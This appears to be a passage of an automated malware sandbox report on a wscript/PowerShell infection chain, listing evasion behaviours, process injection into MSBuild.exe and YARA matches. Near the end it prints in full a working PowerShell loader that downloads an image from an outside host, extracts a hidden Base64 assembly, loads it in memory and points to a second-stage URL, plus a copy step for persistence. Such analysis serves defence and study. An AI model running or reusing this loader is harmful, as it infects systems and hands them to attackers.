                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0040E54F Sleep,ExitProcess,12_2_0040E54F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_02DDF830 sldt word ptr [eax]15_2_02DDF830
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,12_2_004198C2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4031Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5841Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4122
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5636
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7484Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7984Thread sleep count: 4122 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7972Thread sleep count: 5636 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8020Thread sleep time: -25825441703193356s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264Thread sleep count: 135 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264Thread sleep time: -67500s >= -30000sJump to behavior
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeLast function: Thread delayed
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040B335
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,12_2_0041B42F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040B53A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,12_2_004089A9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00406AC2 FindFirstFileW,FindNextFileW,12_2_00406AC2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,12_2_00407A8C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00418C69
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,12_2_00408DA7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00406F06
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: MSBuild.exe, 0000000C.00000002.2256274079.0000000000F98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh'
                        Source: wscript.exe, 00000000.00000003.1702805355.0000022E1292A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                        Source: MSBuild.exe, 0000000C.00000002.2256274079.000000000100D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: MSBuild.exe, 0000000F.00000002.3171710253.0000000000FDA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI call chain: ExitProcess graph end nodegraph_12-47638
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0043A65D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041BCE3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00442554 mov eax, dword ptr fs:[00000030h]12_2_00442554
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0044E92E GetProcessHeap,12_2_0044E92E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00434168
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0043A65D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00433B44
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00433CD7 SetUnhandledExceptionFilter,12_2_00433CD7

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: Yara matchFile source: amsi64_7320.amsi.csv, type: OTHER
                        Source: Yara matchFile source: amsi64_7908.amsi.csv, type: OTHER
                        Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 7272, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7320, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 7860, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7908, type: MEMORYSTR
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 457000Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 470000Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 476000Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 47B000Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: CD0008Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 457000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 470000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 476000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 47B000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D96008
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe12_2_00410F36
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00418754 mouse_event,12_2_00418754
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\talpe.vbs"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
